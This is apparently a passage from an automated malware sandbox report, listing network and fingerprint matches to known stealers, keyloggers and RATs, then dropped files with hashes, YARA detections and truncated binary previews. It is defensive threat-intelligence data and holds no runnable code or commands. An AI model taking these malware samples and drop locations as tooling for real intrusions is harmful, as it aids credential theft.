                                                                                            BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • 208.95.112.1
                                                                                            X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • 208.95.112.1
                                                                                            api.telegram.orgENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • 149.154.167.220
                                                                                            user.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            UpdaterTool.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRUfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                            • 149.154.167.220
                                                                                            ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            http://t.me/hhackplusGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.99
                                                                                            Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • 149.154.167.220
                                                                                            user.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            UpdaterTool.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            document pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            TUT-ASUS1.exeGet hashmaliciousUnknownBrowse
                                                                                            • 208.95.112.1
                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                            • 208.95.112.1
                                                                                            YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 208.95.112.1
                                                                                            Resource.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • 208.95.112.1
                                                                                            P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                            • 208.95.112.1
                                                                                            paint.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • 208.95.112.1
                                                                                            X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
                                                                                            • 208.95.112.1
                                                                                            UNITLINE_RST_NET1RostovnaDonuRUhttp://winningwriters.comGet hashmaliciousUnknownBrowse
                                                                                            • 94.141.120.12
                                                                                            RFQ_BDS636011.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 94.141.120.137
                                                                                            Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                            • 94.141.120.137
                                                                                            QUOTATION#09678.exeGet hashmaliciousRedLineBrowse
                                                                                            • 94.141.120.6
                                                                                            hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 94.141.123.127
                                                                                            hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 94.141.123.127
                                                                                            hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                            • 94.141.123.127
                                                                                            hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 94.141.123.127
                                                                                            hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 94.141.123.127
                                                                                            hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                            • 94.141.123.127

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eUXxZ4m65ro.exeGet hashmaliciousQuasarBrowse
                                                                                            • 149.154.167.220
                                                                                            Customer.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            Solara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            Solara.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            vRecording__0023secs__Stgusa.htmlGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            U1P3u1tkB2.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            9876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                                            • 149.154.167.220
                                                                                            https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Program Files (x86)\Microsoft\Edge\Application\CSC2AA2F9313E4148E19DA14C63DF3823B.TMP

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1168
                                                                                            Entropy (8bit):4.448520842480604
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                            MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                            SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                            SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                            SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                                            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.898959662545016
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6Xam1t9xZ8RxeOAkFJOcV4MKe28dgdTRpvqBH/uulB+hnqXSfbNtm:g6xvxVx9gpvkRTkZzNt
                                                                                            MD5:8479DC9042AC92C741E937B954C39DB8
                                                                                            SHA1:3AC8B538358E5B85A042F1D548497C3357987BA8
                                                                                            SHA-256:133D9178DCEB7363A949EC3B1D48EDBA155330A4CFBFEB1F369D5A4E32085C15
                                                                                            SHA-512:79AB3B71062AD2DD01B223E8A20B155BD21470A2CA9B5B5D2F776C8989C5A09E6D75276CC24C95F851B3D0736D202BFC3C2CEDEEF2374DC068B8DB6ABE33A1BB
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\7dee1dcd228ada

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (311), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):311
                                                                                            Entropy (8bit):5.810891077704598
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:RTBDrfNpa60nRfdVMTwU0HRT+TGfyzf8TimK1/iHVOypSosKJ:bn0n5XMTgHRZfyL82mMk/sm
                                                                                            MD5:84D06289D8633C27E7EC8250D8273993
                                                                                            SHA1:C9481FFF5EDC3A876B22A67C17FAAB48042344FC
                                                                                            SHA-256:73C94FDDC2429985110949181560E27F1FACCF20C2209699A3E0CE1ECA14058F
                                                                                            SHA-512:D03EEB2350DD2827776C1C8CE8BA9BEE451C76869A921A80B7D7ABED405EF367C2443277AE93FFEE5C28993EBA3F08009FD5DCE2173382E8A479A42CD32E4BCE
                                                                                            Malicious:false
                                                                                            Preview:lVtzVX8htS3zvkYgfcaif2Reb2imMuRYhLLkqec0GpMBQ1HyD052DWxtEOYczVV9BeRjZx0A9jbzpQNjutiWyYVKYcgbGABuUN9vkiZQ942d57DyByrFx8KnJGK7RY49iqfcQc9MUSW3f2PaYsaRS67VCWmdYc8kA35OckhizfvfmRHQ1tij8nqmtJa4zgy1Tv3m6A8xK1cxKbtvOVlo4ZmXNTfTKntSr3L0XfT0vuZHK2bRappd4J74JgYnfpngHJGQP2XsBv2J9eMU1N2e7PYh6Rr1GqVGH29BwKCiR7cJRy4oTEwSwIj

                                                                                            C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................X$.........Nw$.. ....$...@.. ........................$...........@..................................w$.K.....$. .....................$...................................................... ............... ..H............text...TW$.. ...X$................. ..`.rsrc... .....$......Z$.............@....reloc........$......^$.............@..B................0w$.....H........... ...................vv$......................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{r...:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............l.......\.......8....r...ps....z*~....(\... .... .... ....s....~....(`....... ....~....{z...:....& ....8.......... ....8w...~....9.... ....~....{....:Y...& ....8N...8v... ....8?.......~....(d...~....(h... ....?J..

                                                                                            C:\Program Files\Windows Mail\27d1bcfc3c54e0

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (421), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):421
                                                                                            Entropy (8bit):5.830239921347405
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:iP2OlhmoycGhZ+qB7BXvwwVVWWMCSYh8ITVptJpLZJH1z7lghrlbAb15EuQRdlpw:GphmDiOdcWMCSs/TpVPzAlcbDEnPk8yv
                                                                                            MD5:6918914B8918718B6932311F965BDB39
                                                                                            SHA1:0EF92513A9E33A70305832381E215015C4624B22
                                                                                            SHA-256:1CB91C97E34144BFB8B46A7BC66EE911AA070A3ACEAF2DBCDFDC2515C33E4E4B
                                                                                            SHA-512:75E14AE9284948AAF6B1A65C70FF9BE67873545BDD36E8FBDC18B7A6E9ACD462C9CAF432A9157CB3E3A05C1B33570E8F941DECFC1BC6C46112E3C3420E8FD6C3
                                                                                            Malicious:false
                                                                                            Preview:wBHeKhrLUNAxOQIWChB4CT9SHQN0DXvVGtewwKJhEHc5iEgSMlI8kbWcCzX4T1H7bpqfvVk2Yez51DtDu5nbOxvpWCt7wOON9fe3XBg0BPkFmbl9FUKXNpso4BItlmFJQl6Wj0psZxa8MpC5au2cE0ATw09V2wOZKazAfOZOob8ZPtbO9MS1tmEZlmjt0TzmiAyvzBaMVnxn1kEDYuWqeXphWaZ2oqXVlW1P4pZ7wGgFzbhAigUG6JHLURZZmhhoPcCftyItVZ3X0ks52ZUIVRYbOp4nPAUPi1zWYCRtXlugPuUujegMMYS8DlQE4fdUEoz9uVg0Ilvug1LeUJDveHCJi1SxvNz1Habl4VAN7pElnibLZvtubs07mpa2DsE4w4mGakj8J0xyDagAaGY9dEZZje8P5HJOlJzt5

                                                                                            C:\Program Files\Windows Mail\System.exe

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Mail\System.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................X$.........Nw$.. ....$...@.. ........................$...........@..................................w$.K.....$. .....................$...................................................... ............... ..H............text...TW$.. ...X$................. ..`.rsrc... .....$......Z$.............@....reloc........$......^$.............@..B................0w$.....H........... ...................vv$......................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{r...:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............l.......\.......8....r...ps....z*~....(\... .... .... ....s....~....(`....... ....~....{z...:....& ....8.......... ....8w...~....9.... ....~....{....:Y...& ....8N...8v... ....8?.......~....(d...~....(h... ....?J..

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7067091120954553
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqO:2JIB/wUKUKQncEmYRTwh0C
                                                                                            MD5:BC824BD115371A3E3DABB44127E47CD1
                                                                                            SHA1:71658438C32C367DF57CFFCF05021071B84807B8
                                                                                            SHA-256:8B9B12B293E2ED544537D8076903DFF4E2C2F328FFFF77BBCCC955451CFFC857
                                                                                            SHA-512:8E613B53D2B60B8AE3C12A6A67CC4AF9A4176239D2FFBA0AA8B1546B8D2227339D7B1B6A94F2B6C7E7D71934E66491DFFCC5988C06EF37BDA0DBAC2F33B30DD2
                                                                                            Malicious:false
                                                                                            Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb90ac45a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                            Category:dropped
                                                                                            Size (bytes):1310720
                                                                                            Entropy (8bit):0.7900113077022748
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:jSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:jazaPvgurTd42UgSii
                                                                                            MD5:A850B6BED786E15E32AB263406F9C027
                                                                                            SHA1:274301E5F98FC3BE9E641FC7487AB335B247AD15
                                                                                            SHA-256:4845B42C3BB61FE95A702981DB2AA7C92A41EACB5B23E862F32BD92DC772EF1F
                                                                                            SHA-512:291EE24696160A3A79D6B8D0D43DFEE762A1693CB1BAE80551E26393B1BF64051F346B997346F323BB9100AB51C74AC3DFA8D5F3BF4BB2DEBDD0DFE2D5558178
                                                                                            Malicious:false
                                                                                            Preview:...Z... ...............X\...;...{......................0.`.....42...{5.7....}Y.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................*.;.7....}Y..................3..7....}Y..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.0821302702335392
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:sEYeleR6XzNt/57Dek3JGjigllillEqW3l/TjzzQ/t:LzleRuPR3tGzGmd8/
                                                                                            MD5:13294CB77981B0A39F47F74E475F4291
                                                                                            SHA1:9F0B0C15D633F2C4B8F7C33934926EC878CD4BB1
                                                                                            SHA-256:26BE3705C8C83355D3136AD7378956402F9FFAE22A2FF617DE9FAB9FCBA6DB46
                                                                                            SHA-512:47DDFB7CA0ED722A9B30F87034493CA132039E3264F55123DF6D5B041604B6AB0BD7011FF5CA728C785A9826CE69D239961AE436031EE9BCDB6243B77786036F
                                                                                            Malicious:false
                                                                                            Preview:.........................................;...{..7....}Y.42...{5.........42...{5.42...{5...Y.42...{59.................3..7....}Y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

                                                                                            Download File
                                                                                            Process:C:\Program Files\Windows Mail\System.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):847
                                                                                            Entropy (8bit):5.354334472896228
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\Update.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):654
                                                                                            Entropy (8bit):5.380476433908377
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                            MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                            SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                            SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                            SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cnvwov.EXE.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\cnvwov.EXE
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
